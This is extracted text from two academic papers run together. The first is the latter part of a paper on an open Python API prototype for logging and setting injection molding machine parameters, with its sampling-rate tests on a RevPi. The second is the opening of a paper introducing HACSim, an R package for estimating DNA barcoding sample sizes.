needed for organized storage and easy access to sampled data. The API prototype The API prototype uses Pyro4 (Pyro, 2020), xml.etree.ElementTree, socket, thread, queue and datetime Python libraries, where Pyro4 is Python Remote Objects library that is used to enable distributed computing between network-based objects. The data is logged only when the machine mold is closed in order to minimize the amount of memory used for data storage. To detect the mold closing, a ‘‘mold force’’ parameter is used. The software unit waits until the mold force parameter reaches a value of ≥300 kN and then starts data collection. It stops when the mold force parameter value becomes lower than the above-specified value. Currently, data from each production cycle (in this case defined as from mold closing to mold opening) are written to a separate file of a user-specified type (.csv, .json, .pickle) and are stored in a folder chosen by a user on the PC connected to the IMM. A proper database management unit needs to be further developed and added to the system in future versions, to provide a scalable way of storing process data. Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 9/20 https://peerj.com https://doi.org/10.7717/peerjcs.302/fig-2 http://dx.doi.org/10.7717/peerj-cs.302 Accessing the IMM parameters data To access the necessary IMM parameter values the prototype uses a list of Uniform Resource Identifiers (URIs) and their correspondence to different parameters on the IMM for the establishment of machine to machine communication. The URIs list was obtained from private communication with ENGEL. A .csv file was created that included all URIs and machine and process parameters of the IMM provided by ENGEL. This file can be updated to enable or disable the collection of certain parameters depending on the necessities of a user. The API prototype can enable three different modes ‘‘Idle’’, ‘‘Fixed cycles’’ and ‘‘Flexible cycles’’ depending on the application. In the ‘‘Idle’’ mode controller ensures that connection is up and that application is able to access the interface’s methods for asynchronous interaction, while the ‘‘Fixed cycles’’ mode is a periodical sampling mechanism of parameters from the IMM that samples all of the parameters simultaneously. The sampling results are available in the queue for the application process. ‘‘Flexible cycles’’ mode takes care of the unbalanced update sampling frequencies to avoid oversampling. Machine parameters on the IMM can have different update frequencies depending on the sampling limitations of the data acquisition system on the IMM. These frequencies can also be manipulated by the user via the IMM’s general user interface. The updating frequencies typically vary from 10 to 1000 ms. At the first run in the ‘‘Flexible cycles’’ mode, the interface acquires the sampling frequency of each parameter from the IMM and groups parameters that have the same update rate. In this mode, the interface checks the last datetime, when each parameter group was updated, and determines if it is time to acquire a new portion of data from the IMM. Acquisition of additional sensors data When it comes to acquisition of data from sensors additionally installed on an IMM or in its molds, the data logging is synchronized. In order to enable the synchronization, the event_sample() method described in Table 2 needs to be triggered for both IMM and the DAQ used for the additional sensors data sampling. This study included the use of a mold with two pressure and temperature multi-sensors. Figure 3 depicts a typical scenario of the API’s use and interaction of its components, where the necessary parameters data is accessed on the IMM and logged from the additional sensors through the RevPi. Communication with an IMM is established through the IMMProxy module and the 3d party sensors DAQ though the DAQProxy and the requested parameter values are obtained. EVALUATION OF THE API PROTOTYPE’S PERFORMANCE Used hardware In order to develop and test that the application programming interface is able to satisfy requirements specified in ‘‘Requirements to an open application programming interface for IMMs’’, an ‘‘ENGEL insert 130’’ vertical injection molding machine with CC300 control unit was used. A mold for ISO 527-2 (ISO, 2012) dog bone parts (15 mm thickness) with two temperature and pressure Kistler multi-sensors type 4021B10H1P1 was used to test the Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 10/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.302 Figure 3 Interaction Sequence Diagram showing ordering of calls to the API and underlying calls for data acquisition. Full-size DOI: 10.7717/peerjcs.302/fig-3 system’s performance with different sampling rates. The sensors’ characteristics are shown in Table 3. The dog bone specimen parts (Fig. 4) are mostly used to define mechanical properties of various materials and are used by both industry and academia for those purposes. To transform analog signals from sensors into digital ones a RevPi (RevPi, 2020b)— Industrial Raspberry Pi is used, namely RevPi Core3 and RevPi Analog Input Output (AIO) modules. RevPi Core3 is a computing unit that uses Raspbian Jessie as the operating system and Preempt-RT patched kernels of version 4.9.52-rt37-v7. RevPi AIO is an analog input/output extension module for the RevPi Core3 which includes necessary analog inputs and outputs to connect to the sensors and to send converted sensor signals to the Core3 unit. The modules are connected through PiBridge (RevPi’s modules connector). Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 11/20 https://peerj.com https://doi.org/10.7717/peerjcs.302/fig-3 http://dx.doi.org/10.7717/peerj-cs.302 Figure 4 Dog bone specimen (ISO 527-2) with 15 mm thickness. Full-size DOI: 10.7717/peerjcs.302/fig-4 Table 3 Pressure and temperature sensor characteristics. Specifications Kistler type 4021B10H1P1 Model Measuring chain Calibration Calibrated by Kistler Measuring Range pressure (Bar) 0..1000 Measuring Range temperature (◦C) 0..350 Temperature accuracy (◦C) ±5 Diameter (mm) 21 Height (mm) 91.5 Natural Frequency (kHz) >165 The RevPi AIO performs analog-to-digital conversion (ADC) with a 24-bit delta-sigma converter (Baker, 2016) (model ADS1248) (RevPi, 2020a). The reason for choosing RevPi is that, unlike commercial DAQs from manufacturers like NI and HBM, RevPi has a significantly lower cost and is an open, modular industrial Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 12/20 https://peerj.com https://doi.org/10.7717/peerjcs.302/fig-4 http://dx.doi.org/10.7717/peerj-cs.302 Table 4 Statistics of overhead measurement for RevPi. Sampling rate [Hz] Mean [s] Std. dev. [s] 5th percentile 95th percentile Overhead over 0.025s [%] 100 0.02532 0.02049 0.022 0.025 0.96 50 0.02611 0.02392 0.023 0.025 1.29 33 0.03001 0.02246 0.023 0.03 1.14 2 0.5006 0.00082 0.5 0.501 0.00 Table 5 Statistics of overhead measurement for IMM DAQ. Sampling rate [Hz] Mean [s] Std. dev. [s] 5th percentile 95th percentile Overhead over 0.025s [%] 100 0.02533 0.01475 0.023 0.025 1.67 50 0.02611 0.01736 0.023 0.025 2.43 33 0.03001 0.01945 0.023 0.031 1.73 2 0.5006 0.01303 0.5 0.501 2.34 PC (RevPi, 2020b). Due to this, it can provide flexibility in which software alternatives can be used together with it. The biggest disadvantage in comparison to commonly used commercial data acquisition systems is RevPi AIO’s maximum sampling rate at 640 Hz. In practice, the sampling rate can be significantly lower due to load on the PiBridge. Further on, the update rate of the data values is reduced by a factor of 5 according to the documentation of the RevPi. As a result, if the analog-to-digital conversion sampling rate is 640 Hz, it will provide an update rate of 128 Hz on RevPi Core3. Due to this RevPi might not be the optimal solution, however, as the described API is a prototype, RevPi is a good demonstration tool. System’s performance in terms of real-time and soft real-time logging In order to assess the system’s performance in terms of its ability to comply with different sampling rates, the API was installed on the RevPi, where three different processes needed to be handled: handling the IMM, handling Kistler sensors signals and synchronization of data acquisition from the injection molding machine and mold sensors. All tests were conducted at length of 4900 samples for sampling rates at 100, 50, 33 and 2 Hz. The IMM machine was turned on and the RevPi was connected to the mold sensors, however, no IMM production runs were performed, therefore, most of the parameter values logged are constant or equal to zero. The ability of the system to set the corresponding machine parameter values was not tested during these tests. The collected data can be found in the supplemental files. Tables 4 and 5 show the mean, standard deviation, 5th and 95th percentiles, as well as the percentage of samples with overhead over 0.025 s among the logged sampling rates, while Fig. 5 depicts histograms for the corresponding sampling rates data. The overhead was calculated based on the following equation: Overhead = ( sampling_rate(real)n+1−sampling_rate(real)n ) −sampling_rate(given), Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 13/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.302 Figure 5 Histograms showing observed times for sampling at different rates. (A) DAQ 100 Hz. (B) IMM 100 Hz. (C) DAQ 50 Hz. (D) IMM 50 Hz. (E) DAQ 33 Hz (F) IMM 33 Hz. (G) DAQ 2 Hz (H) IMM 2 Hz. Full-size DOI: 10.7717/peerjcs.302/fig-5 Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 14/20 https://peerj.com https://doi.org/10.7717/peerjcs.302/fig-5 http://dx.doi.org/10.7717/peerj-cs.302 where sampling_rate(real) is a sampling rate performed by the system for samples n+1 and n. Based on the results shown in Tables 4 and 5, it is easy to see that real-time restrictions of the system apply. For the test with 100 Hz sampling rate, the mean sampling rates that the system performs are around 0.025 s (39.49 Hz) on both IMM and the RevPi. This means that the system cannot comply with the given sampling rate. Examining results from sampling at 50 Hz, it is possible to see that the system performs better than with 100 Hz sampling rate. In this case, the performed mean sampling rate is around 0.026 s (38.29 Hz) (for both IMM and the RevPi). Even better results can be seen at sampling rate at 33 Hz. Here, the average sampling is close to 0.03 s or 33.3 Hz, while the number of overhead values over 0.025 s is 1.14 and 1.73 for the RevPi and the IMM’s DAQ respectively. This indicates that 33 Hz can be one of the appropriate sampling rates for the proposed API. At the same time, 2 Hz sampling rate has the mean value for both IMM and the RevPi at around 0.5 s (1.99 Hz). On the IMM there are 2.34% of samples that have the overhead value higher than 0.025 s, while on the RevPi there are none. Regarding real-time demands, results show that a number of samples with the overhead value higher than 0.025 s are present at logging with any of the tested sampling rates except for the 2 Hz rate for the RevPi. This happens because the system tries to compensate for the sampling deviation, when launched in the ‘‘Flexible cycles’’ mode to avoid oversampling. The RevPi demonstrates that it is able to perform real-time sampling with 2 Hz or lower sampling rate and soft real-time on higher speeds. To improve the system’s performance in term of the real-time performance a more powerful DAQ needs to be used. At the same time, API’s unpredictability comes, among other things, from Python’s memory management mechanism. It uses reference counting collector and generational garbage collector, known as ‘‘gc module’’ for memory reclaim (PythonSoftwareFoundation, 2020). Unlike many other languages, it does not necessarily release the memory back to the operating system, but instead keeps some parts of already allocated memory for use in the future. It is also possible to see that the IMM process is more unpredictable than the RevPi process. This is caused by necessity to establish the server/client connection with the IMM, while there is no such necessity, when the RevPi is directly connected to the sensors and acquires the data from them. It is important to remember that the RevPi is used to access and record the IMM’s parameter values, while their acquisition is performed by the IMM’s internal DAQ, and only the mold sensors are directly connected and the corresponding signals are logged by the RevPi. DISCUSSION AND FUTURE WORK The developed API prototype complies with requirements that were defined in ‘‘Requirements to an open application programming interface for IMMs’’ and is a modular system open for any necessary changes. Its openness is the main difference between the proposed API and commercially available systems with similar functionality. It is possible to see from Table 1 that listed commercial MES (except SAP Manufacturing Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 15/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.302 Execution (SAP. SAP Manufacturing Execution, 2020)) do not include the possibility of adding any modules developed by the system’s user, unless a new module is bought from the software producer. At the same time, they also do not allow to change parameters sampling rate and synchronization of data acquisition from built-in or external sensors. The open API prototype, on the other hand, can be modified to include additional modules. The use of these modules can assist in increasing the quality yield and the overall controllability of the injection molding process. The open application programming interface is developed to simplify data collection and processing for optimization of the injection molding process and bring IMMs closer to being cyber-physical systems capable of self-regulation and self-control. Keeping in mind operational safety, it should be noted that the prototype does not in any way hinder operation of the IMM’s own control system. As a result, if a parameter value that contradicts with the IMM manufacturers’ safety principles is attempted to be set, the value will not be updated on the IMM. At the same time, if a value is updated, in some cases, it might take time to reach the new stationary set point on the IMM. At the moment, the proposed prototype does not check if the IMM has reached the new value and this needs to be controlled by the IMM operator/user. Future work should include development of the corresponding classes for the prototype’s use with other data exchange protocols, such as EUROMAP77 to enable connection to IMMs of other manufacturers; testing of the system with other injection molding machines; further development of the database management unit to allow storage of all the necessary process data. Development of the prototype in terms of the real-time monitoring through implementation of the specialized process architecture (for example, non-blocking queues, concurrent read/write buffers) also needs to be continued. At the same time, a graphical user interface (GUI) or a connector to an existing Industry 4.0 process monitoring platform for the API needs to be implemented. The system’s security also needs to be worked on. In addition, a question of how often the data should be sampled needs further and deeper review. Collaboration with IMM manufacturers, as well as OPC/UA working group would be highly beneficial for further development of the open API for IMMs and the injection molding process compliance with Industry 4.0 paradigms. Adding functionality of the proposed API to the commercially available MES would make them attractive to a broader range of users, including those interested in extensive research and analysis of the injection molding process. An important aspect of Industry 4.0 is simplification of the integration and the communication across different units and machines at the shop floor (Negri, Fumagalli & Macchi, 2017; Kritzinger et al., 2018). A major motivation for the development of the API, is the possibility to enable easy access to machine tool and process parameters data during injection molding for several categories of IMM users. In order to move towards Industry 4.0, both hardware and software should become more open (without compromising systems security and operational safety) for additional modifications by users instead of staying as restricted as it is. Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 16/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.302 SUMMARY This paper has provided requirements, description of the development and capabilities of the open API prototype for injection molding machines. The interface is open for external interaction with the machine controller, allowing logging and setting values of process parameters. The openness of the prototype also provides possibilities for rapid algorithm prototyping and testing, when developing control strategies in the laboratory. The prototype has been tested at 100, 50, 33 and 2 Hz sampling frequencies and can comply with the 33 and 2 Hz rates. Setting of the machine parameters, however, has not been performed during these tests. As to the authors’ knowledge, there are currently no such open systems available. Similar functionality might be provided by commercially available MES, but these systems often have several limitations, such as: high cost, synchronization issues of data logged from injection molding machine and additional sensors, etc. The API prototype proposed in this paper is developed to provide soft real-time data communication between a PC and an IMM through EMI data exchange protocol, as well as allow connection with RevPi for data acquisition from sensors installed in a mold. Even though RevPi has some advantages in terms of cost, openness and high flexibility, its main disadvantage is the low sampling rate and a more powerful DAQ might be necessary to acquire data with higher sampling rates. The interface delivers the possibility of logging up to 97 machine and process parameters and allows building upon the API to integrate necessary data processing algorithms or other modules. The system has been developed using Python3 programming language and is open for changes, such as adding EUROMAP77 or other desirable data exchange protocols. Distributed computing can be practiced with the help of this API to provide additional flexibility and robustness. The prototype is inspired by concepts of Industry 4.0 and cyber-physical systems. The developed API prototype is based on necessity to move towards implementation of Industry 4.0 and cyber-physical systems. The authors hope that it will be able to provide the necessary flexibility for rapid prototyping of methods and algorithms that can lead to enhancement of injection molding machines’ capabilities related to self-optimization and control. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Norwegian Research Council as part of the ‘‘MegaMould’’ Project (project number: 256819) and through the SFI Manufacturing Project (project number: 237900). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Norwegian Research Council as part of the ‘‘MegaMould’’ Project: 256819. SFI Manufacturing Project: 237900. Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 17/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.302 Competing Interests Mats Larsen is a research scientist at SINTEF Manufacturing and Ole Vidar Lyngstad is a research director at SINTEF Manufacturing. Author Contributions • Olga Ogorodnyk and Mats Larsen conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Ole Vidar Lyngstad conceived and designed the experiments, performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. • Kristian Martinsen conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The code is available on GitHub: https://github.com/SintefManufacturing/IMM_API Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.302#supplemental-information. REFERENCES Ageyeva T, Horváth S, Kovács JG. 2019. In-mold sensors for injection molding: on the way to industry 4.0. Sensors 19(16):3551 DOI 10.3390/s19163551. ARBURG. 2020. Host computer system (ALS). Available at https://www.arburg.com/en/ products-and-services/injection-moulding/production-management/host-computer- system-als/ (accessed on 25 June 2020). Baker B. 2016. How delta-sigma ADC work, Part 1. Dallas, Texas, USA: Texas Instru- ments Incorporated. Charest M, Finn R, Dubay R. 2018. Integration of artificial intelligence in an injection molding process for on-line process parameter adjustment. In: Annual IEEE International Systems Conference (SysCon). Piscataway: IEEE. EUROMAP. 2020. EUROMAP 77 –data exchange interface between injection moulding machines and MES. Available at https://opcfoundation.org/markets-collaboration/ plastics-and-rubber-machinery/ (accessed on 25 June 2020). ISO. 2012. ISO 527-2:2017 Plastics –determination of tensile properties –Part 2: test conditions for moulding and extrusion plastics. Available at https://www.iso.org/ standard/56046.html (accessed on 25 June 2020). Jacobson I, Booch G, Rumbaugh J. 1999. The unified process. IEEE Software 1999(3):96–102. KraussMaffei. 2020. MaXecution. Available at https://km.kraussmaffei.com/imm-en/ maxecution.html (accessed on 24 June 2020). Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 18/20 https://peerj.com https://github.com/SintefManufacturing/IMM_API http://dx.doi.org/10.7717/peerj-cs.302#supplemental-information http://dx.doi.org/10.7717/peerj-cs.302#supplemental-information http://dx.doi.org/10.3390/s19163551 https://www.arburg.com/en/products-and-services/injection-moulding/production-management/host-computer-system-als/ https://www.arburg.com/en/products-and-services/injection-moulding/production-management/host-computer-system-als/ https://www.arburg.com/en/products-and-services/injection-moulding/production-management/host-computer-system-als/ https://opcfoundation.org/markets-collaboration/plastics-and-rubber-machinery/ https://opcfoundation.org/markets-collaboration/plastics-and-rubber-machinery/ https://www.iso.org/standard/56046.html https://www.iso.org/standard/56046.html https://km.kraussmaffei.com/imm-en/maxecution.html https://km.kraussmaffei.com/imm-en/maxecution.html http://dx.doi.org/10.7717/peerj-cs.302 Kritzinger W, Karner M, Traar G, Henjes J, Sihn . 2018. Digital twin in manufac- turing: a categorical literature review and classification. IFAC-PapersOnLine 51(11):1016–1022. Kurose JF, Ross KW. 2010. Computer networking: a top-down approach. Boston: Pearson Addison Wesley. Kurt M, Kamber OS, Kaynak Y, Atakok G, Girit O. 2009. Experimental investigation of plastic injection molding: assessment of the effects of cavity pressure and mold tem- perature on the quality of the final products. Materials & Design 30(8):3217–3224 DOI 10.1016/j.matdes.2009.01.004. Kurt M, Kaynak Y, Kamber OS, Mutlu B, Bakir B, Koklu U. 2010. Influence of mold- ing conditions on the shrinkage and roundness of injection molded parts. The International Journal of Advanced Manufacturing Technology 46(5–8):571–578 DOI 10.1007/s00170-009-2149-x. Lee J, Kao HA, Yang SH. 2014. Service innovation and smart analytics for Industry 4.0 and big data environment. Product Services Systems and Value Creation: Proceedings of the 6th Cirp Conference on Industrial Product-Service Systems 16:3–8. Lee EA, Seshia SA. 2016. Introduction to embedded systems: a cyber-physical systems approach. Cambridge, Massachusetts London, England: MIT Press. Maciaszek L, Liong BL. 2005. Practical software engineering: an interactive case-study approach to information systems development. Boston: Pearson Addison Wesley. Madeyski L, Sochmialek M. 2005. Architectural design of modern web applications. Foundations of Computing Decision Sciences 30(1):49–60. Mahmoud MI, Hassan Ammar H, Hamdy MM, Hassan Eissa M. 2015. Production operation management using manufacturing execution systems (MES). In: 2015 11th international computer engineering conference (ICENCO). IEEE. MDPV. 2020. Manufacturing Execution System HYDRA. Available at https://www.mpdv. com/en/products-solutions/mes-hydra/#c2077-1 (accessed on 3 July 2020). Negri E, Fumagalli L, Macchi M. 2017. A review of the roles of digital twin in CPS-based production systems. Procedia Manufacturing 11:939–948 DOI 10.1016/j.promfg.2017.07.198. Ogorodnyk O, Martinsen K. 2018. Monitoring and control for thermoplastics injection molding a review. Procedia CIRP 67:380–385 DOI 10.1016/j.procir.2017.12.229. Osswald TA, Hernandez-Ortiz JP. 2006. Polymer processing modeling and simulation. Munich: Carl Hanser Verlag, 651. Polmak_Plastik. 2020. Polmak plastik products. Available at https://www.polmakplastik. com/en/productsdetail-manufacturing-execution-systems-mes-products-479.html (accessed on 6 July 2020). Pyro. 2020. Python remote objects - 4.60. Available at https://pypi.org/project/Pyro4/ (accessed on 25 June 2020). Python Software Foundation. 2020. gc - Garbage Collector interface. Available at https: //docs.python.org/3/library/gc.html (accessed on 25 June 2020). Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 19/20 https://peerj.com http://dx.doi.org/10.1016/j.matdes.2009.01.004 http://dx.doi.org/10.1007/s00170-009-2149-x https://www.mpdv.com/en/products-solutions/mes-hydra/#c2077-1 https://www.mpdv.com/en/products-solutions/mes-hydra/#c2077-1 http://dx.doi.org/10.1016/j.promfg.2017.07.198 http://dx.doi.org/10.1016/j.procir.2017.12.229 https://www.polmakplastik.com/en/productsdetail-manufacturing-execution-systems-mes-products-479.html https://www.polmakplastik.com/en/productsdetail-manufacturing-execution-systems-mes-products-479.html https://pypi.org/project/Pyro4/ https://docs.python.org/3/library/gc.html https://docs.python.org/3/library/gc.html http://dx.doi.org/10.7717/peerj-cs.302 RevPi. 2020a. How to configure analog input. Available at https://revolution.kunbus.com/ tutorials/uebersicht-aio-2/analoge-eingaenge-konfigurieren-2/ (accessed on 9 July 2020). RevPi. 2020b. Industrial Raspberry Pi. Available at https://revolution.kunbus.com/ revolution-pi-series/ (accessed on 25 June 2020). Saldivar AAF, Goh C, Li Y, Yu H, Chen Y. 2016. Attribute identification and predictive customisation using fuzzy clustering and genetic search for Industry 4.0 environ- ments. In: Software, Knowledge, Information Management & Applications (SKIMA), 2016 10th International Conference on. IEEE. SAP. 2020. SAP manufacturing execution. Available at https://www.sap.com/products/ execution-mes/technical-information.html#extensibility (accessed on 3 July 2020). Tellaeche A, Arana R. 2013. Rapid data acquisition system for complex algorithm testing in plastic molding industry. International Journal of Mechanical, Aerospace, Industrial, Mechatronic and Manufacturing Engineering 7(7):1391–1395. TIG. 2020. TIG authentig. Available at https://www.tig-mes.com/en/software/tig- authentig/ (accessed on 25 May 2020). Vrabič R, Kozjek D, Butala P. 2017. Knowledge elicitation for fault diagnostics in plastic injection moulding: a case for machine-to-machine communication. CIRP Annals 66(1):433–436 DOI 10.1016/j.cirp.2017.04.001. Yin S, Ding SX, Xie X, Luo H. 2014. A review on basic data-driven approaches for industrial process monitoring. IEEE Transactions on Industrial Electronics 61(11):6418–6428 DOI 10.1109/TIE.2014.2301773. Zhang Y, Mao T, Huang Z, Gao H, Li D. 2016. A statistical quality monitoring method for plastic injection molding using machine built-in sensors. The Inter- national Journal of Advanced Manufacturing Technology 85(9–12):2483–2494 DOI 10.1007/s00170-015-8013-2. Zhao P, Zhou H, He Y, Cai K, Fu J. 2014. A nondestructive online method for monitor- ing the injection molding process by collecting and analyzing machine running data. The International Journal of Advanced Manufacturing Technology 72(5–8):765–777 DOI 10.1007/s00170-014-5711-0. Zheng R, Tanner RI, Fan X-J. 2011. Injection molding: integration of theory and modeling methods. Berlin, Heidelberg: Springer Science & Business Media. Zhou X, Zhang Y, Mao T, Zhou H. 2017. Monitoring and dynamic control of quality stability for injection molding process. Journal of Materials Processing Technology 249:358–366 DOI 10.1016/j.jmatprotec.2017.05.038. Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 20/20 https://peerj.com https://revolution.kunbus.com/tutorials/uebersicht-aio-2/analoge-eingaenge-konfigurieren-2/ https://revolution.kunbus.com/tutorials/uebersicht-aio-2/analoge-eingaenge-konfigurieren-2/ https://revolution.kunbus.com/revolution-pi-series/ https://revolution.kunbus.com/revolution-pi-series/ https://www.sap.com/products/execution-mes/technical-information.html#extensibility https://www.sap.com/products/execution-mes/technical-information.html#extensibility https://www.tig-mes.com/en/software/tig-authentig/ https://www.tig-mes.com/en/software/tig-authentig/ http://dx.doi.org/10.1016/j.cirp.2017.04.001 http://dx.doi.org/10.1109/TIE.2014.2301773 http://dx.doi.org/10.1007/s00170-015-8013-2 http://dx.doi.org/10.1007/s00170-014-5711-0 http://dx.doi.org/10.1016/j.jmatprotec.2017.05.038 http://dx.doi.org/10.7717/peerj-cs.302 work_l3z5e7xzgfegbmvfa6eryggaaq ---- Submitted 18 July 2019 Accepted 7 November 2019 Published 6 January 2020 Corresponding author Jarrett D. Phillips, jphill01@uoguelph.ca Academic editor Gang Mei Additional Information and Declarations can be found on page 31 DOI 10.7717/peerj-cs.243 Copyright 2020 Phillips et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS HACSim: an R package to estimate intraspecific sample sizes for genetic diversity assessment using haplotype accumulation curves Jarrett D. Phillips1, Steven H. French1, Robert H. Hanner2 and Daniel J. Gillis1 1 School of Computer Science, University of Guelph, Guelph, Ontario, Canada 2 Department of Integrative Biology, Biodiversity Institute of Ontario, University of Guelph, Guelph, Ontario, Canada ABSTRACT Assessing levels of standing genetic variation within species requires a robust sampling for the purpose of accurate specimen identification using molecular techniques such as DNA barcoding; however, statistical estimators for what constitutes a robust sample are currently lacking. Moreover, such estimates are needed because most species are currently represented by only one or a few sequences in existing databases, which can safely be assumed to be undersampled. Unfortunately, sample sizes of 5–10 specimens per species typically seen in DNA barcoding studies are often insufficient to adequately capture within-species genetic diversity. Here, we introduce a novel iterative extrapolation simulation algorithm of haplotype accumulation curves, called HACSim (Haplotype Accumulation Curve Simulator) that can be employed to calculate likely sample sizes needed to observe the full range of DNA barcode haplotype variation that exists for a species. Using uniform haplotype and non-uniform haplotype frequency distributions, the notion of sampling sufficiency (the sample size at which sampling accuracy is maximized and above which no new sampling information is likely to be gained) can be gleaned. HACSim can be employed in two primary ways to estimate specimen sample sizes: (1) to simulate haplotype sampling in hypothetical species, and (2) to simulate haplotype sampling in real species mined from public reference sequence databases like the Barcode of Life Data Systems (BOLD) or GenBank for any genomic marker of interest. While our algorithm is globally convergent, runtime is heavily dependent on initial sample sizes and skewness of the corresponding haplotype frequency distribution. Subjects Bioinformatics, Computational Biology, Data Science, Optimization Theory and Computation, Scientific Computing and Simulation Keywords Algorithm, DNA barcoding, Extrapolation, Iterative method, Sampling sufficiency, Species INTRODUCTION Background Earth is in the midst of its sixth mass extinction event and global biodiversity is declining at an unprecedented rate (Ceballos et al., 2015). It is therefore important that species genetic diversity be catalogued and preserved. One solution to address this mounting crisis in a How to cite this article Phillips JD, French SH, Hanner RH, Gillis DJ. 2020. HACSim: an R package to estimate intraspecific sample sizes for genetic diversity assessment using haplotype accumulation curves. PeerJ Comput. Sci. 6:e243 http://doi.org/10.7717/peerj-cs.243 https://peerj.com/computer-science mailto:jphill01@uoguelph.ca https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.243 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.243 systematic, yet rapid way is DNA barcoding (Hebert et al., 2003). DNA barcoding relies on variability within a small gene fragment from standardized regions of the genome to identify species, based on the fact that most species exhibit a unique array of barcode haplotypes that are more similar to each other than those of other species (e.g., a barcode ‘‘gap’’). In animals, the DNA barcode region corresponds to a 648 bp fragment of the 5′ terminus of the cytochrome c oxidase subunit I (COI) mitochondrial marker (Hebert et al., 2003; Hebert, Ratnasingham & De Waard, 2003). A critical problem since the inception of DNA barcoding involves determining appropriate sample sizes necessary to capture the majority of existing intraspecific haplotype variation for major animal taxa (Hebert et al., 2004; Meyer & Paulay, 2005; Ward et al., 2005). Taxon sample sizes currently employed in practice for rapid assignment of a species name to a specimen, have ranged anywhere from 1–15 specimens per species (Matz & Nielsen, 2005; Ross, Murugan & Li, 2008; Goodall- Copestake, Tarling & Murphy, 2012; Jin, He & Zhang, 2012; Yao et al., 2017); however, oftentimes only 1–2 individuals are actually collected. This trend is clearly reflected within the Barcode of Life Data Systems (http://www.boldsystems.org) (Ratnasingham & Hebert, 2007), where an overwhelming number of taxa have only a single record and sequence. A fitting comparison to the issue of adequacy of specimen sample sizes can be made to the challenge of determining suitable taxon distance thresholds for species separation on the basis of the DNA barcode gap (Meyer & Paulay, 2005). It has been widely demonstrated that certain taxonomic groups, such as Lepidoptera (butterflies/moths), are able to be readily separated into distinct clusters largely reflective of species boundaries derived using morphology (Čandek & Kuntner, 2015). However, adoption of a fixed limit of 2% difference between maximum intraspecific distance and minimum interspecific (i.e., nearest-neighbour) divergence is infeasible across all taxa (Hebert, Ratnasingham & De Waard, 2003; Collins & Cruickshank, 2013). Species divergence thresholds should be calculated from available sequence data obtained through deep sampling of taxa across their entire geographic ranges whenever possible (Young et al., 2017). There is a clear relationship between specimen sample sizes and observed barcoding gaps: sampling too few individuals can give the impression of taxon separation, when in fact none exists (Meyer & Paulay, 2005; Hickerson, Meyer & Moritz, 2006; Wiemers & Fiedler, 2007; Dasmahapatra et al., 2010; Čandek & Kuntner, 2015), inevitably leading to erroneous conclusions (Collins & Cruickshank, 2013). It is thus imperative that barcode gap analyses be based on adequate sample sizes to minimize the presence of false positives. Introducing greater statistical rigour into DNA barcoding appears to be the clear way forward in this respect (Nielsen & Matz, 2006; Čandek & Kuntner, 2015; Luo et al., 2015; Phillips, Gillis & Hanner, 2019). The introduction of computational approaches for automated species delimitation such as Generalized Mixed Yule Coalescent (GMYC) (Pons et al., 2006; Monaghan et al., 2009; Fujisawa & Barraclough, 2013), Automatic Barcode Gap Discovery (ABGD) (Puillandre, Lambert & Brouillet, 2011) and Poisson Tree Processes (PTP) (Zhang et al., 2013) has greatly contributed to this endeavour in the form of web servers (GMYC, ABGD, PTP) and R packages (GMYC: Species’ LImits by Threshold Statistics, splits (Ezard, Fujisawa & Barraclough, 2017)). Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 2/37 https://peerj.com http://www.boldsystems.org http://dx.doi.org/10.7717/peerj-cs.243 Various statistical resampling and population genetic methods, in particular coalescent simulations, for the estimation of sample sizes, have been applied to Lepidoptera (Costa Rican skipper butterflies (Astraptes fulgerator)) (Zhang et al., 2010) and European diving beetles (Agabus bipustulatus) (Bergsten et al., 2012). Using Wright’s equilibrium island model (Wright, 1951) and Kimura’s stepping stone model (Kimura & Weiss, 1964) under varying effective population sizes and migration rates, Zhang et al. (2010) found that between 156-1985 specimens per species were necessary to observe 95% of all estimated COI variation for simulated specimens of A. fulgerator. Conversely, real species data showed that a sample size of 250-1188 individuals is probably needed to capture the majority of COI haplotype variation existing for this species (Zhang et al., 2010). A subsequent investigation carried out by Bergsten et al. (2012) found that a random sample of 250 individuals was required to uncover 95% COI diversity in A. bipustulatus; whereas, a much smaller sample size of 70 specimens was necessary when geographic separation between two randomly selected individuals was maximized. Others have employed more general statistical approaches. Based on extensive simulation experiments, through employing the Central Limit Theorem (CLT), Luo et al. (2015) suggested that no fewer than 20 individuals per species be sampled. Conversely, using an estimator of sample size based on the Method of Moments, an approach to parameter estimation relying on the Weak Law of Large Numbers (Pearson, 1894), 